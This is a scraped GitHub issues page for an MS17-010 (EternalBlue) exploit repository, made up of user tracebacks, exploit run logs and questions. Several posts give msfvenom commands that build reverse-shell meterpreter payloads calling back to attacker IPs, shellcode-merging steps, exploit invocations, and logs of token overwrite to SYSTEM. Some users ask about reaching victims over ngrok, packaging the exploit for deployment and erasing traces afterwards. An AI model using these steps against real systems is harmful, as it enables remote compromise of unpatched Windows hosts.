worawit / ms17-010 Goto Github PK
View Code? Open in Web Editor NEWMS17-010
MS17-010
how to send payload on this ? it just create pwned.txt on system target..
thanks ...
Thanks for your great code!
I found a connected IPC$, But I don't know the password.
Could I use this IPC$ to attack it and how to?
replace
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
to
conn.getconnectionsfromlist(connected list)
in eternalblue_exploit7.py , there is <shellcode_file> [numGroomConn]. what is shellcode_file,can you give an example?thanks!
I have error each exploit ip. Whay this error?
Code:
for ip in cat ips;
do
python MS17-010/eternalblue_exploit7.py $ip MS17-010/shellcode/sc_all.bin
python MS17-010/eternalblue_exploit8.py $ip MS17-010/shellcode/sc_all.bin
done
Error:
shellcode size: 1739
numGroomConn: 4
Traceback (most recent call last):
File "MS17-010/eternalblue_exploit7.py", line 563, in
exploit(TARGET, sc, numGroomConn)
File "MS17-010/eternalblue_exploit7.py", line 473, in exploit
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in init
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2605, in neg_session
smb = self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
and
socket.error: [Errno 104] Connection reset by peer
...
I was wondering if you had come across this before, I can;t get a reverse shell and it reboots the Windows 7 PC, any help would be much appreciated:
shellcode size: 962
numGroomConn: 3
Target OS: Windows 7 Professional N 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 563, in
exploit(TARGET, sc, numGroomConn)
File "/root/Eternal-Blue-master/eternalblue_exploit7.py", line 545, in exploit
conn.logoff()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3757, in logoff
self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
/home/w/Do/H/N/MS17-010 on master !18 ✘ INT ▓▒░ python checker.py 10.10.10.178
Traceback (most recent call last):
File "checker.py", line 40, in
conn = MYSMB(target)
File "/home/warmachine/Documentos/HTB/Nest/MS17-010/mysmb.py", line 118, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in init
self.neg_session()
File "/home/warmachine/Documentos/HTB/Nest/MS17-010/mysmb.py", line 147, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
I create a folder with name is mysmb in dist-packages and I download mysmb.py in this folder but when I run scripts zzz_exploit.py it said ImportError: No module named mysmb
Do you tutorial how to install Extended Impacket SMB ?
I hope you reply me.
Thank you
Requires another python version?
look this:
root@kali:/Tools/exploits/windows/MS17-010-master# python mysmb.py/Tools/exploits/windows/MS17-010-master# python zzz_exploit.py 10.2.0.103 spollss
root@kali:
Traceback (most recent call last):
File "zzz_exploit.py", line 1057, in
exploit(target, pipe_name)
File "zzz_exploit.py", line 790, in exploit
conn = MYSMB(target)
File "/root/Tools/exploits/windows/MS17-010-master/mysmb.py", line 118, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2412, in init
self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 833, in init
timeout=timeout, local_type=local_type, sock=sock)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 705, in init
self._sock = self._setup_connection((remote_host, sess_port), timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 844, in _setup_connection
raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
socket.error: [Errno Connection error (10.2.0.103:445)] timed out
unable to execute the script. See errors below:
┌──(kali㉿kali)-[~/MS17-010]
└─$ python3 send_and_execute.py
send_and_execute.py <executable_file> [port] [pipe_name]
┌──(kali㉿kali)-[~/MS17-010]
└─$ python3 send_and_execute.py ms17-010.exe 1 ⨯
Trying to connect to :445
Target OS: Windows 5.1
Using named pipe: netlogon
Groom packets
Traceback (most recent call last):
File "/home/kali/MS17-010/send_and_execute.py", line 1077, in
exploit(target, port, pipe_name)
File "/home/kali/MS17-010/send_and_execute.py", line 839, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/kali/MS17-010/send_and_execute.py", line 615, in exploit_fish_barrel
conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)
File "/home/kali/MS17-010/mysmb.py", line 262, in send_trans
self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
File "/home/kali/MS17-010/mysmb.py", line 258, in create_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/kali/MS17-010/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
Hi all, I am quite new to this, bear with me. Not sure if this is a bug or not but I would like to share so that in the event that it is a bug, it will be known.
Note "mysmb.py" is in the same directory as "eternalblue_exploit7.py".
If I attempt to run the exploit using Python: python eternalblue_exploit7.py 192.168.114.45 /Exploits/AutoBlue-MS17-010-master/shellcode/sc_all.bin
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 2, in
from impacket import smb
ImportError: No module named impacket
So I attempted to install the module, however:
root@kali:/Exploits/AutoBlue-MS17-010-master# apt install python-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package python-impacket is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-impacket impacket-scripts
E: Package 'python-impacket' has no installation candidate
I noticed that python3-impacket is already installed on the system:
root@kali:/Exploits/AutoBlue-MS17-010-master# apt install python3-impacket
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3-impacket is already the newest version (0.9.21-2).
The following packages were automatically installed and are no longer required:
libcdio18 libcfitsio8 libgtksourceview2.0-0 libgtksourceview2.0-common libjsoncpp1 libmpdec2
libobjc-9-dev libpoppler82 libprotobuf22 libtsk13 libx264-155 libx264-159 openjdk-8-jre
python-cairo python-dbus python-enchant python-gi python-gobject-2 python-gtk2
python-gtksourceview2 python-numpy python-pkg-resources python3-flask-restless python3-grequests
python3-mimeparse python3-mimerender
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
So I tried to run the exploit with pyhton3: python3 eternalblue_exploit7.py 192.168.114.45 /Exploits/AutoBlue-MS17-010-master/shellcode/sc_all.bin
However the following occurred:
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 76, in
ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde
TypeError: can't concat str to bytes
Any insight is appreciated.
MS17-010 covers six distinct issues. Could you please clarify which issue(s) this exploits?
Thanks for this PoC!
I'm trying to build a fully working .exe for easy deployment (obviously, I cant install Python and tons of dependencies everywhere).
Tried pyinstaller with Python 2.7, it builds the binary, but after running it, I get:
File "C:\PyInstaller-3.2.1\PyInstaller\loader\pyimod03_importers.py", line 389, in load_module
exec(bytecode, module.dict)
File "socket.py", line 47, in
ImportError: No module named _socket
Failed to execute script zzz_exploit
===
Any suggestions about which of the python->exe compilers might work? I can foresee alot of trouble fixing all these missing modules, deps, and dlls... but at least I'd give it a try ... :)
I have my PC running on internet via a router and the attacker machine is on mobile hotspot and port forwarded with ngrok. When creating meterpreter.bin I used LHOST 0.tcp.ngrok.io and LPORT be the port given by ngrok (this is how I do it on normal Meterpreter sessions) now when I scan the public IP of my victims PC with nmap it shows Linux os and shows that it's a router in msfconsole I set LHOST to be 0.0.0.0 and LPORT to be the port forwarded by ngrok.
Now tell me that if I use public IP that shows Linux by nmap can help me get success in this exploit on a windows 8.1 vulnerable machine?
I will upload the nmap report once I get back to pc
Hello
When I try to run zzz_exploit.py (which I renamed 42315.py here), I get the following error: can only concatenate str (not "byte")
I am running python3.
Thanks for your help
python3 42315.py 192.168.1.2 netlogon 1 ⨯
Target OS: Windows Server 2012 R2 Standard 9600
Traceback (most recent call last):
File "/root/42315.py", line 998, in
exploit(target, pipe_name)
File "/root/42315.py", line 834, in exploit
if not info['method'](conn, pipe_name, info):
File "/root/42315.py", line 489, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/root/42315.py", line 333, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/root/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/root/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
.......
Traceback (most recent call last):
File "/home/user/ms/zzz_exploit.py", line 1002, in
exploit(target, pipe_name)
File "/home/user/ms/zzz_exploit.py", line 895, in exploit
service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
File "/home/user/ms/zzz_exploit.py", line 948, in service_exec
rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 964, in bind
self._transport.send(packet.get_packet())
File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 389, in send
self.__smb_connection.transactNamedPipe(self.__tid,self.__handle,data, waitAnswer = False)
File "/usr/lib/python2.7/dist-packages/impacket/smbconnection.py", line 410, in transactNamedPipe
return self._SMBConnection.TransactNamedPipe(treeId, fileId, data, waitAnswer = waitAnswer)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3555, in TransactNamedPipe
self.send_trans(tid,pack('<HH', 0x26, fid),'\PIPE\\x00','',data, noAnswer = noAnswer)
TypeError: send_trans() got an unexpected keyword argument 'noAnswer'
Hi, i have this error 👍 root@kali:~/Documents/exploitation/win/autoBlue/AutoBlue-MS17-010# python eternalblue_checker.py 192.168.255.118 Traceback (most recent call last): File "eternalblue_checker.py", line 40, in <module> conn = MYSMB(target) File "/root/Documents/exploitation/win/autoBlue/AutoBlue-MS17-010/mysmb.py", line 118, in __init__ smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout) File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2423, in __init__ self._sess = nmb.NetBIOSTCPSession(my_name, remote_name, remote_host, host_type, sess_port, self.__timeout) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 878, in __init__ timeout=timeout, local_type=local_type, sock=sock) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 738, in __init__ self._sock = self._setup_connection((remote_host, sess_port), timeout) File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 889, in _setup_connection raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e) socket.error: [Errno Connection error (192.168.255.118:445)] [Errno 111] Connection refused
If you have any idea where the error from, you save my day :)
File "./checker.py", line 56, in
recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 262, in send_trans
self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad))
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 259, in create_trans_packet
return self.create_smb_packet(transCmd, mid, pid, tid)
File "/mnt/hgfs/OSCP/5/MS17-010/mysmb.py", line 229, in create_smb_packet
req = str(pkt)
Reproduction steps:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
...
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445
...
./eternalblue_merge_shellcode.py sc_x86_msf.bin sc_x64_msf.bin sc_out.bin
python eternalblue_exploit7.py IP /opt/MS17-010/shellcode/sc_all.bin
shellcode size: 874
numGroomConn: 13
Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 582, in
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 544, in exploit
recvPkt = conn.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 918, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
the exploit it is working fine, but i dont understant how it work to completed the process and get a meterpreter session.
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x84927da8
SESSION: 0xe2b8b190
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe3693030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe36930d0
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Done
Someone can help me thanks.
Hello,
For some time now, I've been running the following command and receive the below error. I have tried re-installing python-impacket and using the mysmb.py , to no avail. Would you have any insight into what is the problem on my setup/command? Running 2018.1 x64.
Command
python eternalblue_exploit7.py 10.10.10.40 reverse_shell.bin 500
Error:
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 564, in <module>
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 508, in exploit
holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
File "eternalblue_exploit7.py", line 270, in createSessionAllocNonPaged
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in __init__
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2606, in neg_session
return parsePacket(smb)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2560, in parsePacket
if smb.isValidAnswer(SMB.SMB_COM_NEGOTIATE):
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer
raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS)
impacket.smb.SessionError: SMB SessionError: class: ERRDOS, code: ERRnomem(Insufficient server memory to perform the requested function.)
Hello,
Im doing some test with windows server 2012 r2 (fresh install), then using this steps:
nasm -f bin eternalblue_kshellcode_x64.asm
nasm -f bin eternalblue_kshellcode_x86.asm
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4444
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o meterpreter_msf_x86.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4445
cat eternalblue_kshellcode_x64 meterpreter_msf.bin > meterpreter_payload.bin
cat eternalblue_kshellcode_x86 meterpreter_msf_x86.bin > meterpreter_msf_x86.bin
python eternalblue_sc_merge.py meterpreter_payload.bin meterpreter_msf_x86_payload.bin sc_all.bin
eternalblue_exploit8.py << set valid credentials
use msfconsole with exploit/multi/handler
python eternalblue_exploit8.py 192.168.105.163 sc_all.bin 12
shellcode size: 2568
numGroomConn: 12
Target OS: Windows Server 2012 R2 Standard 9600
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
done
Windows Server 2012 R2 always crashes and reboot, no session created.
Am i missing something ?
as the title says
When I try to explotate differents scripts (this or sleepya's) on my VBox Win8, I get next error.
python eternalblue8_exploit.py ... meterpreter.bin 200
shellcode size: 1502
numGroomConn: 1000
Traceback (most recent call last):
File "eternalblue8_exploit.py", line 564, in
exploit(TARGET, sc, numGroomConn)
File "eternalblue8_exploit.py", line 454, in exploit
conn = smb.SMB(target, target)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2402, in init
self.neg_session()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2605, in neg_session
smb = self.recvSMB()
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 2473, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 855, in recv_packet
data = self.__read(timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 933, in __read
data = self.read_function(4, timeout)
File "/usr/lib/python2.7/dist-packages/impacket/nmb.py", line 920, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
What files and registry entries do we need to delete to make the system clean again after the exploit is successful and after gaining reverse shell??
Please!! Anyone?
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.***
RHOSTS => 192.168.1.***
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[] Started reverse TCP handler on 192.168.1.:4444
[-] 192.168.1.:445 - Host does NOT appear vulnerable.
[] 192.168.1.:445 - Connecting to target for exploitation.
[+] 192.168.1.:445 - Connection established for exploitation.
[+] 192.168.1.:445 - Target OS selected valid for OS indicated by SMB reply
[] 192.168.1.:445 - CORE raw buffer dump (42 bytes)
[] 192.168.1.:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 72 Windows 7 Profes
[] 192.168.1.:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 75 sional 7601 Serv
[] 192.168.1.:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 30 ice Pack 1
[+] 192.168.1.:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 192.168.1.:445 - Trying exploit with 12 Groom Allocations.
[] 192.168.1.:445 - Sending all but last fragment of exploit packet
[] 192.168.1.:445 - Starting non-paged pool grooming
[-] 192.168.1.:445 - Rex::ConnectionTimeout: The connection timed out (192.168.1.*:445).
[] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
I can generate shellcodes with c++
Can I use them instead of the two asm files you put to be the used shellcode
And can I do without merging the shellcodes and use one shellcode if I know the architecture of the target
I use eternalblue_exploit7.py for my win7 with the raw shellcode by msfvenom xxx -f raw, but target was bluescreen
how to compile and use eternalblue_kshellcode_xxx.asm for the eternalblue_exploit7.py?
dalao please~
Only eternalblue_exploit7.py and eternalromance_poc.py run successfully.
Facing below problem for other exploits:
ex. python eternalblue_poc.py 10.10.96.53
Traceback (most recent call last):
File "eternalblue_poc.py", line 21, in
conn.login(USERNAME, PASSWORD)
File "/home/pallavi/Desktop/MS17-010-master/mysmb.py", line 137, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
pallavi@pallavi:~/Desktop/MS17-010-master$ python eternalblue_poc.py 10.10.96.53
Traceback (most recent call last):
File "eternalblue_poc.py", line 21, in
conn.login(USERNAME, PASSWORD)
File "/home/pallavi/Desktop/MS17-010-master/mysmb.py", line 137, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
我这边测试的时候是这样的,您看下您那边能帮我指导指导吗?
Traceback (most recent call last):
File "./zzz_exploit.py", line 996, in
exploit(target, pipe_name)
File "./zzz_exploit.py", line 794, in exploit
conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
File "/root/桌面/MS17-010-master/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
] 192.168.234.130:445 - Connecting to target for exploitation.
[+] 192.168.234.130:445 - Connection established for exploitation.
[+] 192.168.234.130:445 - Target OS selected valid for OS indicated by SMB reply
[] 192.168.234.130:445 - CORE raw buffer dump (38 bytes)
[] 192.168.234.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[] 192.168.234.130:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[] 192.168.234.130:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.234.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 192.168.234.130:445 - Trying exploit with 22 Groom Allocations.
[] 192.168.234.130:445 - Sending all but last fragment of exploit packet
[] 192.168.234.130:445 - Starting non-paged pool grooming
[+] 192.168.234.130:445 - Sending SMBv2 buffers
[+] 192.168.234.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 192.168.234.130:445 - Sending final SMBv2 buffers.
[] 192.168.234.130:445 - Sending last fragment of exploit packet!
[] 192.168.234.130:445 - Receiving response from exploit packet
[+] 192.168.234.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 192.168.234.130:445 - Sending egg to corrupted connection.
[] 192.168.234.130:445 - Triggering free of corrupted buffer.
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.234.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[] Exploit completed, but no session was created.
Targeting Windows 8.1 x64 using the guest user account:
python2 checker.py 192.168.10.1
Target OS: Windows 8.1 Connected 9600
The target is not patched
=== Testing named pipes ===
spoolss: Ok (64 bit)
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
python2 zzz_exploit.py 192.168.10.1 spoolss
Target OS: Windows 8.1 Connected 9600
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00208c9a098
InParam: 0xffffc00205e7c16c
MID: 0x1706
unexpected alignment, diff: 0x2e1d098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206410048
InParam: 0xffffc0020627116c
MID: 0x1701
unexpected alignment, diff: 0x19e048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc002064a6098
InParam: 0xffffc0020641d16c
MID: 0x1709
unexpected alignment, diff: 0x88098
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc0020649b048
InParam: 0xffffc002064eb16c
MID: 0x170a
unexpected alignment, diff: 0x-50fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206643048
InParam: 0xffffc002065ef16c
MID: 0x1802
unexpected alignment, diff: 0x53048
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001ff17f048
InParam: 0xffffc0020664916c
MID: 0x1802
unexpected alignment, diff: 0x-74cafb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00206630048
InParam: 0xffffc0020679216c
MID: 0x1802
unexpected alignment, diff: 0x-162fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc00205f41048
InParam: 0xffffc002067c416c
MID: 0x190a
unexpected alignment, diff: 0x-883fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fc1f5048
InParam: 0xffffc002068d916c
MID: 0x1902
unexpected alignment, diff: 0x-a6e4fb8
leak failed... try again
CONNECTION: 0xffffe0005f9981b0
SESSION: 0xffffc001fc352050
FLINK: 0xffffc001fe187098
InParam: 0xffffc0020691e16c
MID: 0x190a
unexpected alignment, diff: 0x-8797f68
leak failed... try again
Done
Can someone please explain how i can throw this exploit at a Windows 2000 vulnerable server. The zzz_exploit just appears to create a txt file on the remote host .. but i need to get a reverse shell
Hi All,
Not sure if your interested.. really like this exploit so ive simplified the build... more so geared towards windows 7 but easily ported to use the other scripts..
my programing level is low,so ican not upgrade this reposity to python3, so is there some very good person can upgrade this reposity to python 3 and impacket latest version,thank you in advance
Traceback (most recent call last):
File "eternalblue_poc.py", line 1, in
from impacket import smb
ImportError: No module named impacket
root@kali:~/MS17-010#_ ./zzz_exploit.py 192.168.111.129 shellcode/sc_all.bin
Target OS: Windows 7 Ultimate 7600
Traceback (most recent call last):
File "./zzz_exploit.py", line 954, in
exploit(target, pipe_name)
File "./zzz_exploit.py", line 795, in exploit
if not info['method'](conn, pipe_name, info):
File "./zzz_exploit.py", line 469, in exploit_matched_pairs
fid = conn.nt_create_andx(tid, pipe_name)
File "/root/MS17-010/mysmb.py", line 170, in nt_create_andx
self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3741, in nt_create_andx
if smb.isValidAnswer(SMB.SMB_COM_NT_CREATE_ANDX):
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 712, in isValidAnswer
raise SessionError, ("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS)
impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
root@kali:~/MS17-010# ping 192.168.111.129 -c 1
PING 192.168.111.129 (192.168.111.129) 56(84) bytes of data.
64 bytes from 192.168.111.129: icmp_seq=1 ttl=128 time=0.906 ms
--- 192.168.111.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.906/0.906/0.906/0.000 ms
root@kali:~/MS17-010# ./eternalblue_exploit7.py 192.168.111.129 shellcode/sc_all.bin
shellcode size: 2284
numGroomConn: 13
Target OS: Windows 7 Ultimate 7600
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
root@kali:~/MS17-010#
_
how to install those exploits to fuzzbunch ?
Hello,
When i run the checker.py, I get an error from mysmb.py:
root@kali:~/Documents/Eternalblue# python checker.py 10.0.0.9
Target OS:
Traceback (most recent call last):
File "checker.py", line 42, in <module>
conn.login(USERNAME, PASSWORD)
File "/root/Documents/EternalBlue/10.0.0.9/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
Is this an error? Or do I have to give checker.py more/less input?
Traceback (most recent call last):
File "eternalblue_exploit7.py", line 563, in
exploit(TARGET, sc, numGroomConn)
File "eternalblue_exploit7.py", line 525, in exploit
recvPkt = conn.recvSMB()
File "build/bdist.macosx-10.13-x86_64/egg/impacket/smb.py", line 2505, in recvSMB
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 899, in recv_packet
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 977, in __read
File "build/bdist.macosx-10.13-x86_64/egg/impacket/nmb.py", line 966, in non_polling_read
impacket.nmb.NetBIOSError: Error while reading from remote
